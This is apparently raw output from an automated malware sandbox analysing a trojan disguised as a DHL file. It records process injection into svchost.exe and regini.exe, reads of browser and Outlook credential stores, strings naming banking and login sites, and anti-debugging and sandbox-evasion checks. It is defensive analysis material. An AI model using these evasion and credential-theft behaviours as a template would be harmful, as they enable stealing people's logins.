                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030B4F406_2_030B4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03041F926_2_03041F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFFB16_2_030FFFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03032FC86_2_03032FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304CFE06_2_0304CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FEE266_2_030FEE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03040E596_2_03040E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03052E906_2_03052E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FCE936_2_030FCE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03049EB06_2_03049EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FEEDB6_2_030FEEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0304AD006_2_0304AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03043D406_2_03043D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F1D5A6_2_030F1D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030F7D736_2_030F7D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03058DBF6_2_03058DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0305FDC06_2_0305FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_0303ADE06_2_0303ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03040C006_2_03040C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030B9C326_2_030B9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030E0CB56_2_030E0CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_03030CF26_2_03030CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_030FFCF26_2_030FFCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C1EA06_2_028C1EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028B13796_2_028B1379
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BB0F46_2_028BB0F4
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BB1006_2_028BB100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C374B6_2_028C374B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C37506_2_028C3750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028C55506_2_028C5550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BAFB06_2_028BAFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BCFB06_2_028BCFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BCD8C6_2_028BCD8C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028BCD906_2_028BCD90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_028DBD406_2_028DBD40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEE3A86_2_02EEE3A8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEE4C56_2_02EEE4C5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EECBB86_2_02EECBB8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EEE85C6_2_02EEE85C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 6_2_02EED9286_2_02EED928
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 030AEA12 appears 84 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 0302B970 appears 266 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03075130 appears 36 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 03087E54 appears 88 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 268 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 89 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
                Source: DHL_734825510.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/9
                Source: C:\Users\user\Desktop\DHL_734825510.exe | File created: C:\Users\user\AppData\Local\Temp\aut5BF.tmp
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: regini.exe, 00000006.00000002.4815970575.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2951763766.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2951888170.0000000002B07000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL_734825510.exe | ReversingLabs: Detection: 42%
                Source: unknown | Process created: C:\Users\user\Desktop\DHL_734825510.exe "C:\Users\user\Desktop\DHL_734825510.exe"
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_734825510.exe"
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_734825510.exe"
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\regini.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RsbLJIqaDYs.exe, 00000005.00000002.4816396248.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4816788031.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2560509259.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558405419.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2655884928.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000006.00000003.2668011132.0000000002E5A000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000003.2665704256.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: regini.exe, 00000006.00000002.4819056247.000000000362C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3062068304.00000000182BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: regini.pdb source: svchost.exe, 00000002.00000003.2623797499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2623732089.000000000341B000.00000004.00000020.00020000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816604781.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414774 push esp; retf 1CE7h | 2_2_0041478E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402029 push FFFFFFFBh; retf | 2_2_00402032
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A991 push ebp; iretd | 2_2_0041A992
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403230 push eax; ret | 2_2_00403232
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411AD3 push edi; retf | 2_2_00411AD4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004182B7 pushad ; iretd | 2_2_004182B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D346 push ds; iretd | 2_2_0040D347
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00412468 pushad ; iretd | 2_2_0041247F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418CCC push esp; retn 55EDh | 2_2_00418CD1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00412484 push 0000003Bh; retf | 2_2_00412486
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040855D push es; ret | 2_2_00408560
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418D33 pushad ; retf | 2_2_00418D85
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417F3C push edi; ret | 2_2_00417F57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404FF0 push esi; ret | 2_2_00404FF1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx | 2_2_03A309B6
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_030309AD push ecx; mov dword ptr [esp], ecx | 6_2_030309B6
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028BF235 pushad ; iretd | 6_2_028BF24C
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028BF251 push 0000003Bh; retf | 6_2_028BF253
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028B532A push es; ret | 6_2_028B532D
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028C5084 pushad ; iretd | 6_2_028C5085
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028C775E push ebp; iretd | 6_2_028C775F
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028BE8A0 push edi; retf | 6_2_028BE8A1
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028B1DBD push esi; ret | 6_2_028B1DBE
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028C4D09 push edi; ret | 6_2_028C4D24
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EE61EE push ecx; ret | 6_2_02EE61F1
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EE51CA push edi; ret | 6_2_02EE51CB
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EE46FA push F89E7CD4h; iretd | 6_2_02EE46FF
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EE7490 push esi; ret | 6_2_02EE74AD
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EEF491 push esi; retf | 6_2_02EEF496
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EE75D0 push 2BEAA342h; iretd | 6_2_02EE75DC
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_02EE0B07 push ss; ret | 6_2_02EE0B08
                Source: initial sample | Static PE information: section name: UPX0
                Source: initial sample | Static PE information: section name: UPX1
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\DHL_734825510.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\DHL_734825510.exe | API/Special instruction interceptor: Address: E3BEFC
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2D324
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2D7E4
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2D944
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2D504
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2D544
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2D1E4
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E30154
                Source: C:\Windows\SysWOW64\regini.exe | API/Special instruction interceptor: Address: 7FFEA3E2DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD1C0 rdtsc | 2_2_03AAD1C0
                Source: C:\Windows\SysWOW64\regini.exe | Window / User API: threadDelayed 9839
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\regini.exe | API coverage: 3.1 %
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952 | Thread sleep count: 134 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952 | Thread sleep time: -268000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952 | Thread sleep count: 9839 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 6952 | Thread sleep time: -19678000s >= -30000s
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960 | Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960 | Thread sleep count: 32 > 30
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960 | Thread sleep time: -48000s >= -30000s
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960 | Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe TID: 6960 | Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe | Code function: 6_2_028CC7B0 FindFirstFileW,FindNextFileW,FindClose, | 6_2_028CC7B0
                Source: 174EBI30.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: outlook.office.comVMware20,11696508427s
                Source: 174EBI30.6.dr | Binary or memory string: discord.comVMware20,11696508427f
                Source: 174EBI30.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
                Source: 174EBI30.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
                Source: 174EBI30.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
                Source: 174EBI30.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
                Source: 174EBI30.6.dr | Binary or memory string: outlook.office365.comVMware20,11696508427t
                Source: DHL_734825510.exe, 00000000.00000003.2350194950.0000000000F0D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe1n-6
                Source: 174EBI30.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                Source: RsbLJIqaDYs.exe, 00000007.00000002.4816532169.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                Source: 174EBI30.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                Source: 174EBI30.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                Source: 174EBI30.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3063507738.0000013B9828C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 174EBI30.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                Source: 174EBI30.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
                Source: 174EBI30.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                Source: 174EBI30.6.dr | Binary or memory string: tasks.office.comVMware20,11696508427o
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                Source: 174EBI30.6.dr | Binary or memory string: global block list test formVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: dev.azure.comVMware20,11696508427j
                Source: 174EBI30.6.dr | Binary or memory string: bankofamerica.comVMware20,11696508427x
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: 174EBI30.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: 174EBI30.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: 174EBI30.6.dr | Binary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD1C0 rdtsc | 2_2_03AAD1C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417913 LdrLoadDll, | 2_2_00417913
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A533A5 mov eax, dword ptr fs:[00000030h] | 2_2_03A533A5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h] | 2_2_03A633A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h] | 2_2_03A633A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] | 2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] | 2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0539D mov eax, dword ptr fs:[00000030h] | 2_2_03B0539D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h] | 2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h] | 2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF3E6 mov eax, dword ptr fs:[00000030h]2_2_03AEF3E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B053FC mov eax, dword ptr fs:[00000030h]2_2_03B053FC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
